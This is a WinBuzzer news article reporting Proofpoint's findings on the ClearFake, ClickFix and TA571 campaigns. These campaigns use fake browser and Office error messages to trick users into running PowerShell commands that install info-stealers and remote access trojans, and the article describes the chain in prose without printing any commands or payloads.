HomeWinBuzzer NewsCybercriminals Exploit Chrome and Word Errors to Distribute Malware via PowerShell Scripts

Cybercriminals Exploit Chrome and Word Errors to Distribute Malware via PowerShell Scripts

The threat actors employ JavaScript within HTML attachments and hijacked websites to generate fake error notifications.

-

Security experts have uncovered a novel malware operation that leverages deceptive error alerts from Google Chrome, Microsoft Word, and OneDrive to persuade users to execute malicious PowerShell scripts. This operation involves multiple threat groups, including those behind ClearFake, ClickFix, and TA571, all known for disseminating extensive spam emails that usually culminate in malware or attacks.

Advanced Social Engineering Techniques

The employ JavaScript within HTML attachments and hijacked websites to generate fake error notifications. These alerts prompt users to copy a PowerShell “fix” command and execute it in a PowerShell prompt or using the Run dialog. The script flushes the DNS cache, clears clipboard data, displays a decoy message, and downloads another PowerShell script with anti-VM checks before fetching an info-stealer.

Proofpoint, a organization, notes that despite requiring significant user action, the attackers' social engineering methods are sophisticated enough to convince users they are resolving legitimate issues.

ClearFake Campaign

Since April, the ClearFake operation has been hijacking authentic websites with harmful HTML and JavaScript. Victims visiting these sites are prompted to install a “root certificate” to properly view the website. They are instructed to copy a PowerShell script and manually run it on their systems.

The script performs several actions, such as flushing the DNS cache, erasing clipboard data, showing a decoy message, and downloading a remote PowerShell script. This script runs additional commands, including fetching an AES-encrypted PowerShell script that extracts and runs files from a ZIP archive. The ZIP archive hosts various legitimate executable files that side-load a trojanized DLL, subsequently activating Lumma Stealer.

ClickFix Campaign

Mid-April saw the ClickFix operation using compromised websites to display an iframe with a bogus alert about a browser update problem. Users were directed to open “Windows PowerShell (Admin)” and paste a provided code, executing a remote PowerShell script that fetched and ran Vidar Stealer, a malware that targets personal information and cryptocurrency wallet data within the compromised environment. The domain serving the payload was taken offline shortly after discovery, disrupting the campaign temporarily.

TA571 Campaign

TA571 was first observed utilizing this approach on 1 March 2024, sending over 100,000 messages to multiple organizations. The campaign used HTML attachments mimicking Microsoft Word documents, with error prompts urging users to execute PowerShell commands, leading to the installation of malware such as DarkGate and Matanbuchus.

On 27 May 2024, TA571 used HTML attachments mimicking OneDrive-hosted documents, directing users to execute PowerShell scripts, thereby installing DarkGate malware. The group has also been seen using the Run dialog instead of the PowerShell terminal, guiding users to run malicious scripts resulting in infections with DarkGate and NetSupport RAT.

Markus Kasanmascheff
Markus Kasanmascheff
Markus is the founder of WinBuzzer and has been playing with Windows and technology for more than 25 years. He is holding a Master´s degree in International Economics and previously worked as Lead Windows Expert for Softonic.com.